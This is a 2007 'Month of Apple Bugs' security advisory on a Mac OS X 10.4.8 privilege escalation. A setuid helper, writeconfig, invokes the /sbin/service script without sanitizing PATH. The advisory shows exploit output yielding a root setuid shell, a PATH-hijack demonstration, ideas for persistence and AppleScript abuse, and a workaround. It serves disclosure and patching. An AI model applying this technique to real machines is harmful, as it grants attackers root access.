Apple provides the following description in the The Preference Application documentation:
System Preferences is the standard location for presenting system-level preferences on OSX. The preference panes shipped with Mac OS X include panes affecting hardware (such as the Sound, Mouse, and Display panes), software integrated into the system (such as the Dock and Screen Saver panes), and behavior applicable to every application (such as the International and General panes). When application preferences apply to the system or to the user's environment as a whole, a developer can make the preference pane available to System Preferences.
Several of the default preference panes rely on a setuid helper,
writeconfig will attempt to start various services by using
Unfortunately, it's simple shell script that doesn't sanitize its
PATH environment variable
when calling the
launchctl utility. This can be abused for executing arbitrary binaries with
Verified on Mac OS X 10.4.8 (8L2127).
Proof of concept, exploit or instructions to reproduce
The provided (simplistic) exploit will create a root setuid shell wrapper at
/tmp/shX. It relies on minimal interaction by the user, read the
'Exploitation conditions' section as this is just one of the possible
methods to abuse the issue.
$ ruby MOAB-21-01-2007.rb ++ Click on Sharing and then click on Windows Sharing... sh-2.05b# id uid=501(lmh) gid=501(lmh) euid=0(root) groups=501(lmh), 81(appserveradm), 79(appserverusr), 80(admin) sh-2.05b# ls -al /private/tmp/ total 72 (...) -rwxr-xr-x 1 lmh wheel 13344 Jan 21 19:29 launchctl -rwsr-xr-x 1 root wheel 13344 Jan 21 19:29 shX -rw-r--r-- 1 lmh wheel 78 Jan 21 19:29 t.c sh-2.05b# exit exit
Note: Nothing is being replaced by this exploit. Simply remove the files created at
The following information shows the hardcoded paths in the
writeconfig binary and
the lack of
PATH sanitization (ex. is binary to be executed located at a path
writable by non-root users?) in
$ strings /System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig | grep '/sbin/' /usr/sbin/ntpdate -bs /usr/sbin/ntpd -f /var/run/ntp.drift -p /var/run/ntpd.pid /usr/sbin/ntpdate /usr/sbin/nvram /sbin/service /usr/sbin/apachectl /usr/sbin/xgridctl /usr/sbin/chown /sbin/mount_hfs /usr/sbin/mDNSResponder /usr/sbin/ntpdate -bs /usr/sbin/ntpd -f /var/run/ntp.drift -p /var/run/ntpd.pid /usr/sbin/ntpdate /usr/sbin/nvram /sbin/service /usr/sbin/apachectl /usr/sbin/xgridctl /usr/sbin/chown /sbin/mount_hfs /usr/sbin/mDNSResponder $ cat /sbin/service | grep launchctl [ "$2" == start ] && launchctl load -w /System/Library/LaunchDaemons/$1.plist [ "$2" == stop ] && launchctl unload -w /System/Library/LaunchDaemons/$1.plist kevin-finisterres-computer:~ kf$ ls -al /System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig -rwsr-xr-x 1 root wheel 141028 Jul 19 2006 /System/Library/PrivateFrameworks/Admin.framework/Resources/writeconfig $ PATH="/Pwndertino" /Applications/System\ Preferences.app/Contents/MacOS/* (...) /sbin/service: line 115: launchctl: command not found /sbin/service: line 115: launchctl: command not found
Apple: running/wrapping shell scripts from setuid binaries is a really Bad Idea ™.
While some may argue that this requires 'user interaction', it's not true. The provided
exploit is simply an example of how to abuse the issue in the easiest way possible. Although,
it could be abused via Applescript (which in fact provides complete GUI scripting facilities)
or by 'poisoning' the environment variables of the current user, and for example, placing the
backdoor at the
/Users/Shared path (to be persistent against reboots and cleanups
of temporal directories). Via Applescript, possibly no interaction would be needed, although,
by just tampering the
PATH environment variable, the user would still need to interact with
the Sharing preferences panel.
Depending on time availability, we might provide a exploit demonstrating these methods as well.
Workaround or temporary solution
$ head /sbin/service #!/bin/sh set -e export PATH="/bin:/sbin:/usr/sbin:/usr/bin" # don't let people kill us. We shouldn't be long, so this isn't a big deal. trap "" TSTP trap "" HUP trap "" INT
"By using responsible disclosure - the vulnerability and exploit lifetimes can be decreased. Patches can be made more quickly. At least that’s what we experience in practice today." -- Dissertations on the unbalanced disclosure-patch times equation, by Dreg Futile Mghee.